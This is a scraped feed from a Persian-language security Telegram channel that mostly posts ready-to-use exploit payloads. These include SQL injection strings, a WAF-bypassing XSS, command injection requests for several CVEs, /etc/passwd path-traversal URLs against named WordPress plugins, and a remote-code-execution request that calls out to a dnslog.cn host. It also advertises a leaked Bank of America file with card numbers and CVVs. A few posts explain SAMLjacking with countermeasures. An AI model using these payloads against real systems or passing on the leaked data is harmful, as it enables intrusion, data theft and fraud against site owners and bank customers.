پایگاه داده اکسپلویت 🧑💻
https://www.exploit-db.com
https://www.milw00rm.com
https://0day.today
https://packetstormsecurity.com
https://www.windowsexploits.com
https://iedb.ir
https://www.macexploit.com
@PfkSecurity
https://www.exploit-db.com
https://www.milw00rm.com
https://0day.today
https://packetstormsecurity.com
https://www.windowsexploits.com
https://iedb.ir
https://www.macexploit.com
@PfkSecurity
Exploit-Db
OffSec’s Exploit Database Archive
The Exploit Database - Exploits, Shellcode, 0days, Remote Exploits, Local Exploits, Web Apps, Vulnerability Reports, Security Articles, Tutorials and more.
SpringBlade SQL
GET /api/blade-desk/notice/list?updatexml(1,concat(0x7e,user(),0x7e),1)=1
#exploit #poc #SQL
@pfksecurity
GET /api/blade-desk/notice/list?updatexml(1,concat(0x7e,user(),0x7e),1)=1
#exploit #poc #SQL
@pfksecurity
CVE-2024-7436
GET /msp_info.htm?flag=cmd&cmd=payload /1.1
Host: {{Host}}
Cookie: {{Cookie}}
payload
#exploit #poc #IoT
@pfksecurity
GET /msp_info.htm?flag=cmd&cmd=payload /1.1
Host: {{Host}}
Cookie: {{Cookie}}
payload
#exploit #poc #IoT
@pfksecurity
این را در مورد CSAM میگوید، اما تمام پیازها را در موتور جستجوی خود که هنوز CSAM دارند، حتی اگر قابل جستجو نباشد، فاش میکند. لطفا از Ahmia استفاده نکنید.
https://ahmia.fi/onions/
@pfksecurity
https://ahmia.fi/onions/
@pfksecurity
BNKoFAmerica.txt
120.4 MB
پایگاه داده 4.8 میلیون کاربر متعلق به Bank Of America
- شناسه کاربری، نام کامل، موجودی، تاریخ انقضا، نوع حساب، CVV
@PfkSecurity
- شناسه کاربری، نام کامل، موجودی، تاریخ انقضا، نوع حساب، CVV
@PfkSecurity
Xss Bypass Waf
<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%2300000000000000000041//
@PfkSecurity
<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%2300000000000000000041//
@PfkSecurity
CVE-2024-6095
POST /models/apply HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
{"url":"file:///etc/passwd"}
#exploit #poc
@PfkSecurity
POST /models/apply HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
{"url":"file:///etc/passwd"}
#exploit #poc
@PfkSecurity
افزونه های وردپرس
____
simple-image-manipulator
activehelper-livehelp
amministrazione-aperta
anti-plagiarism
buddypress-component-stats
dzs-videogallery
e-search
fancy-product-designer
hd-webplayer
localize-my-post
@PfkSecurity
____
simple-image-manipulator
/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd
activehelper-livehelp
/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&
amministrazione-aperta
/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd
anti-plagiarism
/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
buddypress-component-stats
/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
dzs-videogallery
/wp-content/plugins/dzs-videogallery/admin/upload.php
e-search
/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
fancy-product-designer
/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php
hd-webplayer
/wp-content/plugins/hd-webplayer/playlist.php
localize-my-post
/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
@PfkSecurity
CVE-2024-0195 Exploit
POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139
id=&name=test¶meter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B
#exploit #poc
@PfkSecurity
POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139
id=&name=test¶meter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B
#exploit #poc
@PfkSecurity
زمان مغز بزرگ
دانیل راین به عنوان مهندس زیرساخت اصلی برای یک شرکت ناشناس استخدام شد. او عمداً اعتبار کنترلر دامنه را تغییر داد تا از کارفرمایش 750000 دلار اخاذی کند.
او اکنون با 30 سال زندان مواجه است.
https://www.bleepingcomputer.com/news/security/employee-arrested-for-locking-windows-admins-out-of-254-servers-in-extortion-plot/
@PfkSecurity
دانیل راین به عنوان مهندس زیرساخت اصلی برای یک شرکت ناشناس استخدام شد. او عمداً اعتبار کنترلر دامنه را تغییر داد تا از کارفرمایش 750000 دلار اخاذی کند.
او اکنون با 30 سال زندان مواجه است.
https://www.bleepingcomputer.com/news/security/employee-arrested-for-locking-windows-admins-out-of-254-servers-in-extortion-plot/
@PfkSecurity
BleepingComputer
Employee arrested for locking Windows admins out of 254 servers in extortion plot
A former core infrastructure engineer at an industrial company headquartered in Somerset County, New Jersey, was arrested after locking Windows admins out of 254 servers in a failed extortion plot targeting his employer.
🔺 امنیت تهاجمی باعث ایجاد امنیت دفاعی می شود 🔻در اینجا مجموعهای از تکنیکهای حمله SaaS به اشتراک گذاشته شده تا به مدافعان کمک کند تا تهدیداتی را که با آن مواجه میشوند درک کنند
🟣 https://github.com/pushsecurity/saas-attacks
🔷 این پروژه مجموعهای از تکنیکهای حمله مختص به Software as a service (SaaS) را معرفی میکند و با استفاده از چارچوب MITRE ATT&CK، به تحلیل تهدیدات امنیتی در محیطهای SaaS میپردازد.
#Saas
#APT
@PfkSecurity
GitHub
GitHub - pushsecurity/saas-attacks: Offensive security drives defensive security. We're sharing a collection of SaaS attack techniques…
Offensive security drives defensive security. We're sharing a collection of SaaS attack techniques to help defenders understand the threats they face. #nolockdown - pushsecurity/saas-attacks
P.F.K Security
🔺 امنیت تهاجمی باعث ایجاد امنیت دفاعی می شود 🔻 در اینجا مجموعهای از تکنیکهای حمله SaaS به اشتراک گذاشته شده تا به مدافعان کمک کند تا تهدیداتی را که با آن مواجه میشوند درک کنند 🟣 https://github.com/pushsecurity/saas-attacks 🔷 این پروژه مجموعهای از تکنیکهای…
🔺 تکنیک SAMLjacking یکی از روش های حملات فیشینگ است که روی قابلیت SSO (Single Sign-On) که اغلب در پلتفرمهای SaaS (نرمافزار به عنوان سرویس) استفاده میشود، تمرکز دارد
در این نوع حمله، مهاجمان از اعتماد کاربران به فرآیندهای SSO سوءاستفاده میکنند تا بهطور غیرمجاز به سیستمهای یک شرکت دسترسی پیدا کنند.
⭕️ مراحل حمله:
مهاجم ابتدا یک حساب کاربری جدید در یک پلتفرم SaaS ایجاد میکند. این پلتفرمها معمولاً شامل ابزارهای مختلفی هستند که شرکتها برای مدیریت فعالیتهای خود استفاده میکنند
💢 مانند Miro، Office 365، یا سایر خدمات مشابه.
⭕️ تنظیمات اولیه:
پس از ثبتنام، مهاجم میتواند تنظیمات مختلف حساب را پیکربندی کند. یکی از این تنظیمات مهم، پیکربندی URL مربوط به SSO (احراز هویت یکپارچه) است.
💢 این آدرسی است که سرویسهای SSO برای احراز هویت کاربران از آن استفاده میکنند. مهاجم میتواند این URL را طوری تنظیم کند که به یک سرور تحت کنترل خود اشاره کند و عملیات فیشینگ را کامل کند
📩 مهاجم میتواند دعوتنامههایی برای پیوستن به این "حساب جدید شرکتی" ارسال کند. این دعوتنامهها به کاربران جدید یا اعضای بالقوه شرکت ارسال میشود.
📮 دعوتنامهها بهطور معمول از دامنهای به نظر میرسد که قانونی و معتبر است (از دامنه سرویسدهنده SaaS).
📌 اگر مهاجم در ابتدا از یک URL سرویسی که به نظر قانونی است استفاده کند و سپس URL SSO را به سرور خود تغییر دهد، کاربران ممکن است فکر کنند که URL SSO تغییر نکرده و بدون شک به ورود ادامه دهند.
⚠️ راهکارهای مقابله:
🔰آگاهی و آموزش: آموزش کارکنان، بهویژه کارکنان جدید، در مورد ریسکهای حملات فیشینگ و چگونگی شناسایی دعوتنامههای مشکوک
🔰 پیکربندی SSO: اطمینان از اینکه پیکربندیهای SSO بهطور دقیق کنترل و نظارت میشوند. هر گونه تغییر در URLهای SSO باید بازبینی و تأیید شود.
🔰 ابزارهای پیشگیری از فیشینگ: استفاده از ابزارهای پیشرفته پیشگیری از فیشینگ که میتوانند ایمیلها یا لینکهای مخرب را قبل از رسیدن به کارکنان شناسایی و مسدود کنند.
🔰 ممیزی SSO: انجام ممیزیهای منظم روی پیکربندیها و لاگهای SSO برای شناسایی هرگونه تغییر غیرمجاز یا فعالیت مشکوک.
👁🗨 https://www.youtube.com/watch?v=4gAeSxbycXU
📚 https://pushsecurity.com/blog/samljacking-a-poisoned-tenant/
#Initial_Access
#APT
در این نوع حمله، مهاجمان از اعتماد کاربران به فرآیندهای SSO سوءاستفاده میکنند تا بهطور غیرمجاز به سیستمهای یک شرکت دسترسی پیدا کنند.
⭕️ مراحل حمله:
مهاجم ابتدا یک حساب کاربری جدید در یک پلتفرم SaaS ایجاد میکند. این پلتفرمها معمولاً شامل ابزارهای مختلفی هستند که شرکتها برای مدیریت فعالیتهای خود استفاده میکنند
💢 مانند Miro، Office 365، یا سایر خدمات مشابه.
⭕️ تنظیمات اولیه:
پس از ثبتنام، مهاجم میتواند تنظیمات مختلف حساب را پیکربندی کند. یکی از این تنظیمات مهم، پیکربندی URL مربوط به SSO (احراز هویت یکپارچه) است.
💢 این آدرسی است که سرویسهای SSO برای احراز هویت کاربران از آن استفاده میکنند. مهاجم میتواند این URL را طوری تنظیم کند که به یک سرور تحت کنترل خود اشاره کند و عملیات فیشینگ را کامل کند
📩 مهاجم میتواند دعوتنامههایی برای پیوستن به این "حساب جدید شرکتی" ارسال کند. این دعوتنامهها به کاربران جدید یا اعضای بالقوه شرکت ارسال میشود.
📮 دعوتنامهها بهطور معمول از دامنهای به نظر میرسد که قانونی و معتبر است (از دامنه سرویسدهنده SaaS).
📌 اگر مهاجم در ابتدا از یک URL سرویسی که به نظر قانونی است استفاده کند و سپس URL SSO را به سرور خود تغییر دهد، کاربران ممکن است فکر کنند که URL SSO تغییر نکرده و بدون شک به ورود ادامه دهند.
⚠️ راهکارهای مقابله:
🔰آگاهی و آموزش: آموزش کارکنان، بهویژه کارکنان جدید، در مورد ریسکهای حملات فیشینگ و چگونگی شناسایی دعوتنامههای مشکوک
🔰 پیکربندی SSO: اطمینان از اینکه پیکربندیهای SSO بهطور دقیق کنترل و نظارت میشوند. هر گونه تغییر در URLهای SSO باید بازبینی و تأیید شود.
🔰 ابزارهای پیشگیری از فیشینگ: استفاده از ابزارهای پیشرفته پیشگیری از فیشینگ که میتوانند ایمیلها یا لینکهای مخرب را قبل از رسیدن به کارکنان شناسایی و مسدود کنند.
🔰 ممیزی SSO: انجام ممیزیهای منظم روی پیکربندیها و لاگهای SSO برای شناسایی هرگونه تغییر غیرمجاز یا فعالیت مشکوک.
👁🗨 https://www.youtube.com/watch?v=4gAeSxbycXU
📚 https://pushsecurity.com/blog/samljacking-a-poisoned-tenant/
#Initial_Access
#APT
YouTube
SAMLjacking a poisoned tenant demo
Find more techniques: https://github.com/pushsecurity/saas-attacks
Read our blog post: https://pushsecurity.com/blog/saas-attack-techniques/
Read our blog post: https://pushsecurity.com/blog/saas-attack-techniques/
توسعه بدافزار برای هکرهای اخلاقی، منتشر شده توسط Packt
https://github.com/PacktPublishing/Malware-Development-for-Ethical-Hackers
@pfksecurity
https://github.com/PacktPublishing/Malware-Development-for-Ethical-Hackers
@pfksecurity
GitHub
GitHub - PacktPublishing/Malware-Development-for-Ethical-Hackers: Malware Development for Ethical Hackers, published by Packt
Malware Development for Ethical Hackers, published by Packt - PacktPublishing/Malware-Development-for-Ethical-Hackers
سوء استفاده از کنترل کننده های استثنا (رویکرد بدافزار به SEH)
https://moval0x1.github.io/posts/the-abuse-of-exception-handlers/
@pfksecurity
https://moval0x1.github.io/posts/the-abuse-of-exception-handlers/
@pfksecurity
The Reverser's Draft
The Abuse of Exception Handlers
How Exception Handlers can be abused in low-level stuff
Tricky ASP blind SQL Injection in a login page.
Payload👇
';%20waitfor%20delay%20'0:0:6'%20--%20
@pfksecurity
Payload👇
';%20waitfor%20delay%20'0:0:6'%20--%20
@pfksecurity